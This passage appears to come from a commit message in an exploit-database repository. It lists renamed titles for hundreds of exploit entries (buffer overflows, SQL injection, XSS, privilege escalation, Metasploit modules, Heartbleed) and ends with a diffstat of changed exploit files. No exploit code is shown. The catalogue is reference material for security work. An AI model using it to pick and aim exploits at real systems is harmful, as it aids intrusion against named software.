4.5.1 - Buffer Overflow (Metasploit) Ricoh DC Software DL-10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow Sitecom WLM-2501 new - Multiple Cross-Site Request Forgery Vulnerabilities Sitecom WLM-2501 - Multiple Cross-Site Request Forgery Vulnerabilities Ricoh DC DL-10 SR10 - FTP USER Command Buffer Overflow (Metasploit) Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit) TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam - ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow TRENDnet SecurView TV-IP121WN Wireless Internet Camera - UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow Quest InTrust Annotation Objects - Uninitialized Pointer (Metasploit) Quest InTrust - Annotation Objects Uninitialized Pointer (Metasploit) TFTP Server for Windows 1.4 - ST WRQ Buffer Overflow (Metasploit) TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit) samsung net-i ware 1.37 - Multiple Vulnerabilities Samsung NET-i ware 1.37 - Multiple Vulnerabilities iOS 5.1.1 - Safari Browser - JS match() & search() Crash (PoC) Apple iOS 5.1.1 - Safari Browser - JS match() & search() Crash (PoC) GIMP - script-fu Server Buffer Overflow (Metasploit) GIMP script-fu - Server Buffer Overflow (Metasploit) SugarCRM 6.3.1 - Unserialize() PHP Code Execution (Metasploit) SugarCRM CE 6.3.1 - Unserialize() PHP Code Execution (Metasploit) Openfire 3.6.0a - Admin Console Authentication Bypass (Metasploit) Openfire Server 3.6.0a - Admin Console Authentication Bypass (Metasploit) Tiki Wiki 8.3 - Unserialize() PHP Code Execution (Metasploit) Tiki Wiki CMS Groupware 8.3 - Unserialize() PHP Code Execution (Metasploit) Ipswitch IMail 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 - Weak Password Encryption Ipswitch IMail Server 5.0/5.0.5/5.0.6/5.0.7/5.0.8/6.0 - Weak Password Encryption UoW imapd 10.234/12.264 - Buffer Overflow UoW imapd 10.234/12.264 - LSUB Buffer Overflow (Metasploit) UoW imapd 10.234/12.264 - COPY Buffer Overflow (Metasploit) UoW IMAPd Server 10.234/12.264 - Buffer Overflow UoW IMAPd Server 10.234/12.264 - LSUB Buffer Overflow (Metasploit) UoW IMAPd Serve 10.234/12.264 - COPY Buffer Overflow (Metasploit) RedHat 6.2 - Piranha Virtual Server Package Default Account and Password RedHat 6.2 Piranha Virtual Server Package - Default Account and Password Microsoft Windows - Escalate Task Scheduler XML Privilege Escalation (Metasploit) Microsoft Windows - Task Scheduler XML Privilege Escalation (Metasploit) hp jetadmin 5.5.177/jetadmin 5.6 - Directory Traversal HP JetAdmin 5.5.177/jetadmin 5.6 - Directory Traversal Alienvault OSSIM 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection Alienvault OSSIM Open Source SIEM 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection RedHat 6 - glibc/locale Subsystem Format String Solaris 2.6/7.0 - /locale Subsystem Format String RedHat 6 GLIBC/locale - Subsystem Format String Solaris 2.6/7.0 /locale - Subsystem Format String Solaris 2.6/7.0 - 'eject' locale Subsystem Format String Solaris 2.6/7.0 'eject' locale - Subsystem Format String Microsoft IIS 4.0/5.0 and PWS Extended Unicode - Directory Traversal (5) Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (5) RedHat restore 0.4 b15 - Insecure Environment Variables RedHat 0.4 b15 restore - Insecure Environment Variables Viscosity OpenVPN Client (OSX) - Privilege Escalation Viscosity - Privilege Escalation Solaris 2.x/7.0/8 catman - Race Condition (1) Solaris 2.x/7.0/8 catman - Race Condition (2) Solaris 2.x/7.0/8 Catman - Race Condition (1) Solaris 2.x/7.0/8 Catman - Race Condition (2) sap NetWeaver dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities T-dah Webmail - Multiple Persistent Cross-Site Scripting T-dah Webmail Client - Multiple Persistent Cross-Site Scripting Ntpd - Remote Buffer Overflow NTPd - Remote Buffer Overflow Ipswitch WS_FTP 2.0 - Anonymous Multiple FTP Command Buffer Overflow Ipswitch WS_FTP Server 2.0 - Anonymous Multiple FTP Command Buffer Overflow Solaris 2.x/7.0/8 lpd - Remote Command Execution HP-UX 11.0 SWVerify - Buffer Overflow Solaris 2.x/7.0/8 LPD - Remote Command Execution HP-UX 11.0 - SWVerify Buffer Overflow phusion WebServer 1.0 - Directory Traversal (1) phusion WebServer 1.0 - Directory Traversal (2) Phusion WebServer 1.0 - Directory Traversal (1) Phusion WebServer 1.0 - Directory Traversal (2) Progress 9.1 - sqlcpp Local Buffer Overflow Progress Database 9.1 - sqlcpp Local Buffer Overflow PsyBNC 2.3 - Oversized Passwords Denial of Service psyBNC 2.3 - Oversized Passwords Denial of Service Wu-imapd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1) Wu-imapd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2) WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (1) WU-IMAPd 2000/2001 - Partial Mailbox Attribute Remote Buffer Overflow (2) Midicart - PHP Arbitrary File Upload Midicart PHP - Arbitrary File Upload otrs 3.1 - Persistent Cross-Site Scripting OTRS 3.1 - Persistent Cross-Site Scripting EType EServ 2.9x POP3 - Remote Denial of Service EType EServ 2.9x - POP3 Remote Denial of Service Invision Power Board 3.3.4 - 'Unserialize()' PHP Code Execution Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution Invision Power Board 3.3.4 - Unserialize Regex Bypass Invision Power Board (IP.Board) 3.3.4 - Unserialize Regex Bypass ttCMS 2.2 - / ttForum 1.1 news.php template Parameter Remote File Inclusion ttCMS 2.2 - / ttForum 1.1 install.php installdir Parameter Remote File Inclusion ttCMS 2.2 / ttForum 1.1 - news.php template Parameter Remote File Inclusion ttCMS 2.2 / ttForum 1.1 - install.php installdir Parameter Remote File Inclusion Invision IP.Board 3.3.4 - Unserialize() PHP Code Execution (Metasploit) Invision Power Board (IP.Board) 3.3.4 - Unserialize() PHP Code Execution (Metasploit) NFR Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit) Novell File Reporter (NFR) Agent FSFUI Record - Arbitrary File Upload / Remote Code Execution (Metasploit) Kerio MailServer 5.6.3 - add_acl Module Overflow Kerio MailServer 5.6.3 add_acl Module - Overflow phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 - pagemaster Module PAGE_id Parameter Cross-Site Scripting phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module - PAGE_id Parameter Cross-Site Scripting IBM System Director - Remote System Level Exploit IBM System Director Agent - Remote System Level Exploit Tectia SSH - USERAUTH Change Request Password Reset (Metasploit) (SSH.com Communications) SSH Tectia - USERAUTH Change Request Password Reset (Metasploit) Oracle MySQL for Microsoft Windows - MOF Execution (Metasploit) Oracle MySQL (Windows) - MOF Execution (Metasploit) CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (1) CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (2) GNU CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (1) GNU CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (2) IWConfig - Local ARGV Command Line Buffer Overflow (1) IWConfig - Local ARGV Command Line Buffer Overflow (2) IWConfig - Local ARGV Command Line Buffer Overflow (3) Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (1) Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (2) Wireless Tools 26 (IWConfig) - Local ARGV Command Line Buffer Overflow (3) Novell File Reporter Agent - XML Parsing Remote Code Execution Novell File Reporter (NFR) Agent - XML Parsing Remote Code Execution RhinoSoft Serv-U FTP Server 3/4 - MDTM Command Stack Overflow (1) RhinoSoft Serv-U FTP Server 3/4 - MDTM Command Stack Overflow (2) RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (1) RhinoSoft Serv-U FTPd Server 3/4 - MDTM Command Stack Overflow (2) RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1) RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2) RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3) RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (4) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (1) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3) RhinoSoft Serv-U FTPd Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (4) Alan Ward A-Cart 2.0 - category.asp catcode Parameter SQL Injection Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection Nagios - history.cgi Remote Command Execution Nagios3 - history.cgi Remote Command Execution phpshop 2.0 - SQL Injection phpShop 2.0 - SQL Injection Freesshd - Authentication Bypass (Metasploit) FreeSSHD - Authentication Bypass (Metasploit) RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Open Proxy Relay RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Arbitrary File Access RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Open Proxy Relay RiSearch 0.99 /RiSearch Pro 3.2.6 - show.pl Arbitrary File Access SLMail 5.5 - POP3 PASS Remote Buffer Overflow SLMail 5.5 - Remote Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - POP3 PASS Remote Buffer Overflow Seattle Lab Mail (SLMail) 5.5 - Remote Buffer Overflow AT-TFTP Server 2.0 - Stack Based Buffer Overflow Denial of Service Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Based Buffer Overflow Denial of Service Microsoft Windows Light HTTPD 0.1 - Buffer Overflow Light HTTPD 0.1 (Windows) - Buffer Overflow MSN Messenger 6.2.0137 - '.png' Buffer Overflow Microsoft MSN Messenger 6.2.0137 - '.png' Buffer Overflow Smail-3 - Multiple Remote and Local Vulnerabilities Smail 3 - Multiple Remote and Local Vulnerabilities Cisco Linksys E4200 Firmware - Multiple Vulnerabilities Cisco Linksys E4200 - Multiple Vulnerabilities Salim Gasmi GLD 1.x - Postfix Greylisting Daemon Buffer Overflow Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow Claroline 1.5/1.6 - userInfo.php Multiple Parameter SQL Injection Claroline 1.5/1.6 - exercises_details.php exo_id Parameter SQL Injection Claroline E-Learning 1.5/1.6 - userInfo.php Multiple Parameter SQL Injection Claroline E-Learning 1.5/1.6 - exercises_details.php exo_id Parameter SQL Injection PHPCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection phpCOIN 1.2 - 'login.php' PHPcoinsessid Parameter SQL Injection NPDS 4.8 - /5.0 admin.php language Parameter Cross-Site Scripting NPDS 4.8 - /5.0 powerpack_f.php language Parameter Cross-Site Scripting NPDS 4.8 - /5.0 sdv_infos.php sitename Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - admin.php language Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - powerpack_f.php language Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - sdv_infos.php sitename Parameter Cross-Site Scripting NPDS 4.8 - /5.0 reviews.php title Parameter Cross-Site Scripting NPDS 4.8 - /5.0 reply.php image_subject Parameter Cross-Site Scripting NPDS 4.8 - /5.0 Glossaire Module terme Parameter SQL Injection NPDS 4.8 - /5.0 links.php Query Parameter SQL Injection NPDS 4.8 - /5.0 faq.php categories Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - reviews.php title Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - reply.php image_subject Parameter Cross-Site Scripting NPDS 4.8 < 5.0 - Glossaire Module terme Parameter SQL Injection NPDS 4.8 < 5.0 - links.php Query Parameter SQL Injection NPDS 4.8 < 5.0 - faq.php categories Parameter Cross-Site Scripting SlimServe httpd 1.0/1.1 - Directory Traversal WhitSoft SlimServe httpd 1.0/1.1 - Directory Traversal Quick TFTP Server 2.2 - Denial of Service Quick TFTP Server Pro 2.2 - Denial of Service aeNovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection Aenovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection XMB 1.9.3 - u2u.php Cross-Site Scripting XMB Forum 1.9.3 - u2u.php Cross-Site Scripting PHPAlbum 0.2.3/4.1 - Local File Inclusion PHP Photo Album 0.2.3/4.1 - Local File Inclusion Zoom X4/X5 ADSL Modem - Multiple Vulnerabilities Zoom Telephonics X4/X5 ADSL Modem - Multiple Vulnerabilities BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret) BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct Ret) NetBSD mail.local - Privilege Escalation (Metasploit) NetBSD mail.local(8) - Privilege Escalation (Metasploit) PCMAN FTP 2.07 - PASS Command Buffer Overflow PCMan FTP Server 2.07 - PASS Command Buffer Overflow PCMAN FTP 2.07 - STOR Command Buffer Overflow PCMan FTP Server 2.07 - STOR Command Buffer Overflow EImagePro - - subList.asp CatID Parameter SQL Injection EImagePro - subList.asp CatID Parameter SQL Injection OZJournals 1.2 - Vname Parameter Cross-Site Scripting OZJournals 1.2 - 'Vname' Parameter Cross-Site Scripting SoftBiz Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection SoftBiz Dating Script 1.0 - products.php cid Parameter SQL Injection SoftBiz Dating Script 1.0 - 'index.php' cid Parameter SQL Injection SoftBiz Dating Script 1.0 - news_desc.php id Parameter SQL Injection SoftBizScripts Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection SoftBizScripts Dating Script 1.0 - products.php cid Parameter SQL Injection SoftBizScripts Dating Script 1.0 - 'index.php' cid Parameter SQL Injection SoftBizScripts Dating Script 1.0 - news_desc.php id Parameter SQL Injection OZJournals 1.5 - Multiple Input Validation Vulnerabilities Baby FTP server 1.24 - Denial of Service PCMAN FTP 2.07 - STOR Command Stack Overflow (Metasploit) PCMan FTP Server 2.07 - STOR Command Stack Overflow (Metasploit) Sophos Web Protection Appliance sblistpack - Arbitrary Command Execution (Metasploit) Sophos Web Protection Appliance - 'sblistpack' Arbitrary Command Execution (Metasploit) Festalon 0.5 - '.HES' Files Remote Heap Buffer Overflow Festalon 0.5 - '.HES' Remote Heap Buffer Overflow EZContents 2.0. - gallery_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion EZContents 2.0 - gallery_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion Google Earth 4.0.2091 (Beta) - KML/KMZ Files Buffer Overflow Google Earth 4.0.2091 (Beta) - '.KML'/'.KMZ' Buffer Overflow A-CART 2.0 - category.asp catcode Parameter SQL Injection Alan Ward A-CART 2.0 - category.asp catcode Parameter SQL Injection Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk Denial of Service Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service Microsoft Windows NDPROXY - Local SYSTEM Privilege Escalation (MS14-002) Microsoft Windows - 'NDPROXY' Local SYSTEM Privilege Escalation (MS14-002) Fish - Multiple Remote Buffer Overflow Vulnerabilities FiSH-irssi - Multiple Remote Buffer Overflow Vulnerabilities Microsoft Windows XP/2000 - 'WinMM.dll' .WAV Files Remote Denial of Service Microsoft Windows XP/2000 - 'WinMM.dll' / '.WAV' Remote Denial of Service Comersus Cart 7.0.7 Cart - comersus_message.asp redirectUrl Cross-Site Scripting Comersus Cart 7.0.7 - comersus_message.asp redirectUrl Cross-Site Scripting LanDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow LANDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow SAP DB 7.x - Web Server WAHTTP.exe Multiple Buffer Overflow Vulnerabilities SAP DB 7.x Web Server - WAHTTP.exe Multiple Buffer Overflow Vulnerabilities Lanius CMS 1.2.14 - FAQ Module mid Parameter SQL Injection Lanius CMS 1.2.14 - EZSHOPINGCART Module cid Parameter SQL Injection Lanius CMS 1.2.14 FAQ Module - 'mid' Parameter SQL Injection Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' Parameter SQL Injection Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal Thomson SpeedTouch 2030 - SIP Invite Message Remote Denial of Service Thomson SpeedTouch ST 2030 (SIP Phone) - SIP Invite Message Remote Denial of Service Uebimiau 2.7.x - 'index.php' Cross-Site Scripting Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting Seagate BlackArmor - Root Exploit Seagate BlackArmor NAS - Root Exploit Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filtering Apple Safari 1.x/3.0.x / Firefox 1.5.0.x/2.0.x - JavaScript Multiple Fields Key Filtering PCMAN FTP 2.07 - ABOR Command Buffer Overflow PCMAN FTP 2.07 - CWD Command Buffer Overflow PCMan FTP Server 2.07 - ABOR Command Buffer Overflow PCMan FTP Server 2.07 - CWD Command Buffer Overflow HP OpenView Network Node Manager 7.x - (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access HP OpenView Network Node Manager (OV NNM) 7.x -OpenView5.exe Action Parameter Traversal Arbitrary File Access amfphp 1.2 - browser/details class Parameter Cross-Site Scripting amfPHP 1.2 - browser/details class Parameter Cross-Site Scripting PCMAN FTP 2.07 - Buffer Overflow PCMan FTP Server 2.07 - Buffer Overflow Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit Ultra Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit SAFARI Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities Apple Safari Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities Novell Groupwise Messenger 2.0 - Client Buffer Overflow Novell Groupwise Messenger 2.0 Client - Buffer Overflow Meeting Room Booking System - (MRBS) 1.2.6 day.php area Parameter Cross-Site Scripting Meeting Room Booking System - (MRBS) 1.2.6 week.php area Parameter Cross-Site Scripting Meeting Room Booking System - (MRBS) 1.2.6 month.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting Meeting Room Booking System - (MRBS) 1.2.6 report.php area Parameter Cross-Site Scripting Meeting Room Booking System - (MRBS) 1.2.6 help.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting Oracle VirtualBox 3D Acceleration - Multiple Vulnerabilities Oracle VM VirtualBox 3D Acceleration - Multiple Vulnerabilities OpenNms 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting OpenNms 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting OpenNms 1.5.x - event/list filter Parameter Cross-Site Scripting OpenNMS 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting OpenNMS 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting OpenNMS 1.5.x - event/list filter Parameter Cross-Site Scripting OpenNms 1.5.x - HTTP Response Splitting OpenNMS 1.5.x - HTTP Response Splitting Lynx 2.8 - '.mailcap' and '.mime.type' Files Local Code Execution Lynx 2.8 - '.mailcap'/'.mime.type' Local Code Execution Zeeways SHAADICLONE 2.0 - 'admin/home.php' Authentication Bypass Zeeways Shaadi Clone 2.0 - 'admin/home.php' Authentication Bypass Pilot Group PG Roommate - SQL Injection Pilot Group PG Roommate Finder Solution - SQL Injection OpenSSL TLS Heartbeat Extension - Memory Disclosure OpenSSL TLS Heartbeat Extension - ''Heartbleed' Memory Disclosure OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions) OpenSSL 1.0.1f TLS Heartbeat Extension - 'Heartbleed' Memory Disclosure (Multiple SSL/TLS versions) Heartbleed OpenSSL - Information Leak Exploit (1) OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak Exploit (1) IBM Director 5.20 - CIM Server Privilege Escalation IBM System Director Agent 5.20 - CIM Server Privilege Escalation Heartbleed OpenSSL - Information Leak Exploit (2) DTLS Support OpenSSL TLS Heartbeat Extension - 'Heartbleed' Information Leak Exploit (2) (DTLS Support) Kolibri 2.0 - GET Request Stack Buffer Overflow Kolibri Web Server 2.0 - GET Request Stack Buffer Overflow Easy Chat Server 3.1 - Stack Buffer Overflow EFS Easy Chat Server 3.1 - Stack Buffer Overflow Sphider 1.3.6 - Multiple Vulnerabilities Sphider Search Engine 1.3.6 - Multiple Vulnerabilities Kolibri WebServer 2.0 - GET Request SEH Exploit Kolibri Web Server 2.0 - GET Request SEH Exploit MQAC.sys - Arbitrary Write Privilege Escalation (Metasploit) Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation (Metasploit) VirtualBox - 3D Acceleration Virtual Machine Escape (Metasploit) VirtualBox Guest Additions - 'VBoxGuest.sys' Privilege Escalation (Metasploit) Oracle VM VirtualBox 4.3.6 - 3D Acceleration Virtual Machine Escape (Metasploit) Oracle VM VirtualBox Guest Additions 4.3.10r93012 - 'VBoxGuest.sys' Privilege Escalation (Metasploit) Impact Software Ad Peeps - Cross-Site Scripting / HTML Injection Impact Software AdPeeps - Cross-Site Scripting / HTML Injection PPScript - 'shop.htm' SQL Injection Payment Processor Script (PPScript) - 'shop.htm' SQL Injection ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution ManageEngine DesktopCentral - Arbitrary File Upload / Remote Code Execution Microsoft Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060) Microsoft Windows - OLE Remote Code Execution 'Sandworm' Exploit (MS14-060) Eclipse 3.3.2 IDE Help Server - help/advanced/searchView.jsp SearchWord Parameter Cross-Site Scripting Eclipse 3.3.2 IDE - Help Server help/advanced/searchView.jsp SearchWord Parameter Cross-Site Scripting TaskFreak 0.6.4 - 'index.php' Multiple Parameter Cross-Site Scripting TaskFreak 0.6.4 - print_list.php Multiple Parameter Cross-Site Scripting TaskFreak 0.6.4 - rss.php HTTP Referer Header Cross-Site Scripting TaskFreak! 0.6.4 - 'index.php' Multiple Parameter Cross-Site Scripting TaskFreak! 0.6.4 - print_list.php Multiple Parameter Cross-Site Scripting TaskFreak! 0.6.4 - rss.php HTTP Referer Header Cross-Site Scripting WordPress Plugin Wp Symposium 14.11 - Unauthenticated Arbitrary File Upload WordPress Plugin WP Symposium 14.11 - Unauthenticated Arbitrary File Upload Pandora 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit) Pandora FMS 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit) Oracle MySQL for Microsoft Windows - FILE Privilege Abuse (Metasploit) Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit) Exim ESMTP 4.80 glibc gethostbyname - Denial of Service Exim ESMTP 4.80 - glibc gethostbyname Denial of Service Support Incident Tracker - (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection Support Incident Tracker (SiT!) 3.63 p1 - search.php search_string Parameter SQL Injection alitbang CMS 3.3 - alumni.php hal Parameter SQL Injection Balitbang CMS 3.3 - alumni.php hal Parameter SQL Injection HP Network Node Manager i 9.10 - nnm/mibdiscover node Parameter Cross-Site Scripting HP Network Node Manager i 9.10 - nnm/protected/configurationpoll.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager i 9.10 - nnm/protected/ping.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager i 9.10 - nnm/protected/statuspoll.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager i 9.10 - nnm/protected/traceroute.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager (NMM) i 9.10 - nnm/mibdiscover node Parameter Cross-Site Scripting HP Network Node Manager (NMM) i 9.10 - nnm/protected/configurationpoll.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager (NMM) i 9.10 - nnm/protected/ping.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager (NMM) i 9.10 - nnm/protected/statuspoll.jsp nodename Parameter Cross-Site Scripting HP Network Node Manager (NMM) i 9.10 - nnm/protected/traceroute.jsp nodename Parameter Cross-Site Scripting Publish-It - PUI Buffer Overflow (SEH) Publish-It - '.PUI' Buffer Overflow (SEH) WordPress Plugin WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin) WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin) Yaws 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities Yaws-Wiki 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities abrt (Fedora 21) - Race Condition Abrt (Fedora 21) - Race Condition Webgate WESP SDK 1.2 - ChangePassword Stack Overflow WebGate WESP SDK 1.2 - ChangePassword Stack Overflow Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034) Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034) Oracle - Outside-In DOCX File Parsing Memory Corruption Oracle - Outside-In '.DOCX' File Parsing Memory Corruption iTunes 10.6.1.7 - '.pls' Title Buffer Overflow Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow WordPress Plugin Leaflet Maps Marker 0.0.1 for - leaflet_marker.php id Parameter Cross-Site Scripting WordPress Plugin Leaflet Maps Marker 0.0.1 - leaflet_marker.php id Parameter Cross-Site Scripting Microsoft Windows 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070) Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070) Mozilla Firefox < 39.03 - pdf.js Same Origin Policy Exploit Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy Exploit Mozilla Firefox - pdf.js Privileged JavaScript Injection (Metasploit) Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit) MiniUPnP - Multiple Denial of Service Vulnerabilities MiniUPnP 1.4 - Multiple Denial of Service Vulnerabilities Kaseya Virtual System Administrator - Multiple Vulnerabilities (2) Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2) Safari - User-Assisted Applescript Exec Attack (Metasploit) Apple Safari - User-Assisted Applescript Exec Attack (Metasploit) Acrobat Reader DC 15.008.20082.15957 - PDF Parsing Memory Corruption Acrobat Reader DC 15.008.20082.15957 - '.PDF' Parsing Memory Corruption Dynamic Biz Website Builder - (QuickWeb) 1.0 apps/news-events/newdetail.asp id Parameter SQL Injection Dynamic Biz Website Builder (QuickWeb) 1.0 - apps/news-events/newdetail.asp id Parameter SQL Injection Xangati XSR And XNR - 'gui_input_test.pl' Remote Command Execution Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap Based Out-of-Bounds Read pdfium CPDF_TextObject::CalcPositionData - Heap Based Out-of-Bounds Read pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Based Out-of-Bounds Read pdfium - CPDF_TextObject::CalcPositionData Heap Based Out-of-Bounds Read pdfium CPDF_Function::Call - Stack Based Buffer Overflow pdfium - CPDF_Function::Call Stack Based Buffer Overflow Foxit Reader 7.2.8.1124 - PDF Parsing Memory Corruption Foxit Reader 7.2.8.1124 - '.PDF' Parsing Memory Corruption Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit) Netgear ProSafe Network Management System NMS300 - Arbitrary File Upload (Metasploit) Novell Service Desk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities Novell ServiceDesk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities Oracle Application Testing Suite 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass MiCasa VeraLite - Remote Code Execution MiCasaVerde VeraLite - Remote Code Execution SmallFTPd 1.0.3 - 'mkd' Command Denial of Service SmallFTPd 1.0.3 - 'mkd' Command Denial Of Service GNU GTypist 2.9.5-2 - Local Buffer Overflow uSQLite 1.0.0 - Denial Of Service HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation Joomla 3.4.4 - 3.6.4 - Account Creation / Privilege Escalation CherryTree 0.36.9 - Memory Corruption (PoC) --- files.csv | 1327 +++++++++++++------------- platforms/asp/webapps/15653.txt | 28 +- platforms/asp/webapps/38351.txt | 20 +- platforms/bsd/remote/105.pl | 36 +- platforms/bsd/remote/234.c | 180 ++-- platforms/cgi/webapps/39145.txt | 8 +- platforms/jsp/webapps/19432.rb | 156 +-- platforms/jsp/webapps/39687.txt | 20 +- platforms/jsp/webapps/39691.py | 112 +-- platforms/linux/dos/35951.py | 22 +- platforms/linux/local/1215.c | 40 +- platforms/linux/local/140.c | 16 +- platforms/linux/local/178.c | 50 +- platforms/linux/local/184.pl | 128 +-- platforms/linux/local/20185.c | 48 +- platforms/linux/local/215.c | 132 +-- platforms/linux/local/229.c | 24 +- platforms/linux/local/23299.c | 28 +- platforms/linux/local/23300.c | 22 +- 